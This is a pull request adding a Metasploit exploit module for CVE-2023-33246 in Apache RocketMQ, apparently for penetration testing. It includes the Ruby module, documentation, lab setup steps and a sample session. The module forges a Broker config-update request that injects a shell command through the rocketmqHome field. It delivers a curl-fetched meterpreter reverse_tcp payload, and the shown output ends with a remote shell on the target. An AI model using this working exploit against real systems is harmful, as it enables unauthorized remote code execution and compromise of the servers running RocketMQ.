### PR TITLE
Apache RocketMQ update config RCE (CVE-2023-33246)

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_rocketmq_update_config.md
+++ b/documentation/modules/exploit/multi/http/apache_rocketmq_update_config.md
@@ -1,0 +1,121 @@
+## Vulnerable Application
+
+RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is
+leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using
+the update configuration function to execute commands as the system users that RocketMQ is running as.
+Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.
+
+### Setup
+
+#### Docker setup
+Instructions taken from https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT
+
+```
+    docker pull apache/rocketmq:4.9.4
+    # Start nameserver
+    docker run --rm --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
+    # Start Broker
+    docker run --rm --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
+```
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Do: ` use exploit/multi/http/apache_rocketmq_update_config`.
+1. Set the `RHOST` and `LHOST` options.
+1. Run the module.
+1. Receive a session in the context of the user running the RocketMQ application.
+
+## Options
+
+### BROKER_PORT
+The port the target RocketMQ Broker component is running on. If left unset the default port will be used if a Broker
+port associated with the RHOST cannot be determined from querying the RocketMQ NameServer.
+
+## Scenarios
+
+### Docker container running RocketMQ 4.9.4, Target: Automatic (Unix In-Memory)
+
+```
+msf6 > use multi/http/apache_rocketmq_update_config
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_rocketmq_update_config) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/apache_rocketmq_update_config) > set FETCH_SRVHOST 172.16.199.158
+FETCH_SRVHOST => 172.16.199.158
+msf6 exploit(multi/http/apache_rocketmq_update_config) > set lhost 172.16.199.158
+lhost => 172.16.199.158
+msf6 exploit(multi/http/apache_rocketmq_update_config) > options
+
+Module options (exploit/multi/http/apache_rocketmq_update_config):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   BROKER_PORT  10911            no        The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the
+                                           NameServer response (recommended)
+   RHOSTS       127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
+                                           l
+   RPORT        9876             yes       The RocketMQ NameServer port (TCP)
+   SSL          false            no        Negotiate SSL for incoming connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                       no        The URI to use for this exploit (default is random)
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
+                                        to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      OAvAHUouS        no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST       172.16.199.158   yes       Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.158   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/apache_rocketmq_update_config) > run
+
+[*] Started reverse TCP handler on 172.16.199.158:4444
+[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
+[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
+[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
+[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
+[*] Sending stage (3045348 bytes) to 172.17.0.3
+[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
+[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
+[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
+[*] Meterpreter session 5 opened (172.16.199.158:4444 -> 172.17.0.3:35532) at 2023-07-04 11:26:58 -0700
+
+meterpreter > getuid
+Server username: rocketmq
+meterpreter > sysinfo
+Computer     : 172.17.0.3
+OS           : CentOS 7.9.2009 (Linux 5.15.0-76-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+

--- a/modules/exploits/multi/http/apache_rocketmq_update_config.rb
+++ b/modules/exploits/multi/http/apache_rocketmq_update_config.rb
@@ -1,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Auxiliary::Rocketmq
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache RocketMQ update config RCE',
+        'Description' => %q{
+          RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is
+          leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using
+          the update configuration function to execute commands as the system users that RocketMQ is running as.
+          Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.
+        },
+        'Author' => [
+          'Malayke', # PoC
+          'jheysel-r7',  # module - RCE portion
+          'h00die',      # module - Version detection & parsing
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT#usage-examples'],
+          [ 'CVE', '2023-33246']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
+              'Type' => :nix_memory
+            }
+          ],
+        ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 60
+        },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-23',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),
+        OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])
+      ]
+    )
+  end
+
+  def check
+    @version_request_response = send_version_request
+    @parsed_data = parse_rocketmq_data(@version_request_response)
+    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']
+
+    version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version
+
+    if version > Rex::Version.new('5.0.0')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
+    elsif version <= Rex::Version.new('4.9.5')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
+    end
+    Exploit::CheckCode::Safe("RocketMQ version: #{version}")
+  end
+
+  def execute_command(cmd, opts = {})
+    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
+rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
+    header = [data.length + 3].pack('N') + "\x00\x00\x00"
+    payload = header + data
+
+    begin
+      vprint_status("Payload command to be executed: #{cmd}")
+      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => opts[:broker_port].to_i })
+      vprint_status("Payload is #{data}")
+      sock.put(payload)
+    rescue Rex::ConnectionError, ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
+      fail_with(Failure::Unreachable, "Unable to connect: #{e.class} #{e.message}")
+    end
+  end
+
+  def on_new_session(session)
+    print_status('Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted')
+
+    if session.type == 'meterpreter'
+      pwd = session.fs.dir.pwd
+    else
+      pwd = session.shell_command_token('pwd')
+    end
+
+    # The session returned by the exploit spawns inside $ROCKETMQ_HOME/bin
+    pwd.gsub!('/bin', '')
+    print_good("Determined the original $ROCKETMQ_HOME: #{pwd}")
+    print_status('Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value')
+
+    execute_command(pwd, { broker_port: @broker_port })
+  end
+
+  def exploit
+    @version_request_response ||= send_version_request
+    @parsed_data ||= parse_rocketmq_data(@version_request_response)
+    @broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])
+    print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")
+    execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })
+  end
+end


### PR DESCRIPTION
This module exploits an RCE in Apache RocketMQ. Vulnerable RocketMQ instances leave a number of different components exposed on the extranet and are accessible without authentication. The components include the NameServer, Broker, and Controller. Using an API request to the Broker, one can update the Broker's configuration file. The request to update the Broker's configuration file is susceptible to command injection which enables a metasploit-framework user to obtain a meterpreter session in the context of the user running Apache RocketMQ.

## Verification Steps

- [ ] Ensure #18122 gets landed as this PR is dependant on those changes.
- [ ] Install the application: 
```
    docker pull apache/rocketmq:4.9.4
    # Start nameserver
    docker run --rm --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
    # Start Broker
    docker run --rm --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```
- [ ] Start msfconsole
- [ ] Do: ` use exploit/multi/http/apache_rocketmq_update_config`.
- [ ] Set the `RHOST` `LHOST` and `FETCH_SRVHOST` options.
   - [ ] Note you may have to shorten `FETCH_FILENAME` as it's length is randomized and can push the payload over the size limit
- [ ] Run the module.
- [ ] Do: `exploit`
- [ ] Receive a session in the context of the user running the RocketMQ application.

